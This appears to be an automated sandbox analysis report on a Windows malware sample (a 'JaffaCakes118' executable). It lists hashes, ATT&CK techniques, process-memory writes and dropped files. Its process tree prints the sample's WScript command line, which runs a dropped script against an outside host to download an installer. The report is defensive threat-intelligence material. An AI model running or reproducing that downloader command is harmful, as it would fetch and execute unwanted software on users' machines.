cfa9fc8db9ff8e27a9b1fca5b637df7a05b4ac357fe5d377b254a9b5d940ba84

Analysis

max time kernel
119s
max time network
124s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
26-08-2024 04:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe
Size

184KB
MD5

c243278876573cbbcc050a9fb911164d
SHA1

993c2c616a666fa155c87cf24f80ad95b9bd84b1
SHA256

cfa9fc8db9ff8e27a9b1fca5b637df7a05b4ac357fe5d377b254a9b5d940ba84
SHA512

d61ab51ac9aee2938bf5cebd2f09864effb95f61f60b88164e34737ae0f77eb68eea2fd3350753d8a71f16143a4c0ca12c9a0d23d7e2ea84c2ed3a167b8a06ed
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3u:/7BSH8zUB+nGESaaRvoB7FJNndnP

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2328	WScript.exe
8	2328	WScript.exe
10	2328	WScript.exe
12	1956	WScript.exe
13	1956	WScript.exe
15	2012	WScript.exe
16	2012	WScript.exe
18	2856	WScript.exe
19	2856	WScript.exe
22	2156	WScript.exe
23	2156	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2288	2088	WerFault.exe	30

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2088 wrote to memory of 2328	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	31
PID 2088 wrote to memory of 2328	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	31
PID 2088 wrote to memory of 2328	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	31
PID 2088 wrote to memory of 2328	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	31
PID 2088 wrote to memory of 1956	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	33
PID 2088 wrote to memory of 1956	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	33
PID 2088 wrote to memory of 1956	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	33
PID 2088 wrote to memory of 1956	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	33
PID 2088 wrote to memory of 2012	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	35
PID 2088 wrote to memory of 2012	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	35
PID 2088 wrote to memory of 2012	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	35
PID 2088 wrote to memory of 2012	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	35
PID 2088 wrote to memory of 2856	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	37
PID 2088 wrote to memory of 2856	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	37
PID 2088 wrote to memory of 2856	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	37
PID 2088 wrote to memory of 2856	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	37
PID 2088 wrote to memory of 2156	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	39
PID 2088 wrote to memory of 2156	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	39
PID 2088 wrote to memory of 2156	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	39
PID 2088 wrote to memory of 2156	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	39
PID 2088 wrote to memory of 2288	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	41
PID 2088 wrote to memory of 2288	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	41
PID 2088 wrote to memory of 2288	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	41
PID 2088 wrote to memory of 2288	2088	c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe	41

C:\Users\Admin\AppData\Local\Temp\c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\c243278876573cbbcc050a9fb911164d_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2088
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufDBCE.js" http://www.djapp.info/?domain=PJFOkDiBiG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fufDBCE.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2328
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufDBCE.js" http://www.djapp.info/?domain=PJFOkDiBiG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fufDBCE.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1956
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufDBCE.js" http://www.djapp.info/?domain=PJFOkDiBiG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fufDBCE.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2012
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufDBCE.js" http://www.djapp.info/?domain=PJFOkDiBiG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fufDBCE.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2856
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufDBCE.js" http://www.djapp.info/?domain=PJFOkDiBiG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fufDBCE.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2156
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2088 -s 536
  2⤵
  - Program crash
  PID:2288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
fb4082c272abd4264e85ccf35824a240

SHA1
d51616e228abbabd5d8abbc7477e454659ec202c

SHA256
f1e2c0cfed586034ab459aeccfdaa828f7d7c1fb5a83e1e7e1eb19ef95b82351

SHA512
15595e71e4ec883a4e8286dbcf91156957eda1b96b69041145168d9f8b197de9c375d433cd2e6424ade12968a1142681cd338fee5d7af7f65166ea30bd6a9c39

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
a52e127b162f659194ee6862332ba967

SHA1
aa8857e57818ad40356f90e8b8fbc89f8cc5acc4

SHA256
4061ff4f3f605a58c6631653f593022c381d683db9709b28800d66d7d939b6b3

SHA512
6c1a20fa5646bd5bbe8f9f5e212bab52272422d1f021dede1b987956b479b6c96333996c295226178a1b4dd5b86349a06bf3171217978b96815fb6285e37bf92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NT8UAXPK\domain_profile[1].htm

Filesize
40KB

MD5
849e83625ebefd024a9e6035cedce8f5

SHA1
e2cecdee169040a93363b21f108b101f11cbc208

SHA256
12632b25118f25c13c7a9cb43bafb7219ae1e305e4654b4dea557ce2d07565bd

SHA512
165406963ac4a1789ecb4cb5d07b30eea790a02dc4b9b97249b91af0926cd7f0b78d4234118fd89ef2521b8338b36baea771eb09b17a7914d4b72be9ef7c221d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NT8UAXPK\domain_profile[1].htm

Filesize
6KB

MD5
22d0b8d4897ec1d75edc34b656add62c

SHA1
c7a06879a57488f443563c56f1c26b35c8668d3f

SHA256
36ac9fb827bb3041fe438f9a65afc1ff3024601d4ef2cb258b4d13716b531515

SHA512
1f1095be4c8c9535fa70d151b8d0e0baa5ca3eb3a2ad60f5bcef7f973d6c73ea153b8694d7b754fa7dbed779174e9791b395033946fa5d7d848235f0012cabbf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YUF3ZB4A\domain_profile[1].htm

Filesize
40KB

MD5
417084d7127b74660e8ed27e9a783e84

SHA1
8aac138b91974b15ae8922f9e49324c2d1e9ddfc

SHA256
598b5b4e2140328bf1a7cddbbbd76e3f58b67decec1f11a9f32d8bef95991144

SHA512
7dc2e74cc2415a12ab0d27ba1bda123948f809071e08645cf4a8fe7a1b6c38160a6374fe1d43cb42eb403d20871b296ae3168df44d2540fb55c923378c3c4313

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YUF3ZB4A\domain_profile[1].htm

Filesize
40KB

MD5
eacd6845ca7410f3e35b8859dcab316c

SHA1
6c95e5826f0cfcb6819edb2f97cd608b7dfedb79

SHA256
a84b8b396de5dbd433a7192557798f30dd59b0acf8098ffd309e76174c0bbf30

SHA512
f980e01fddf1a0c631482a4757c676a67cd259c185b93ec9d4a48a64b0446d1aa529f23a17e775e10beb2c0e0cf17d23f6e6ceb5bcebb9999545062dd4a93265

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab23D6.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3DEB.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufDBCE.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\A2RFF74V.txt

Filesize
175B

MD5
059f0cd8484abc4e97e17c4858859b02

SHA1
12e6962de49c6b2eddd181b53e74a8c5c9b4cb3a

SHA256
a2641f276eb8d2ab73b4159c11c8e7a2e0e63350eb6dc1f2d868d6ecd890665a

SHA512
d6eae76e8f651ee5f25c4c6dce5627adb239d464cd8639568f4c612f7c9dbc6b6ac47fea06f6bb37493937b54961bddc96608c4d9273d2b47ab5af2e59d4eb14

Download Submit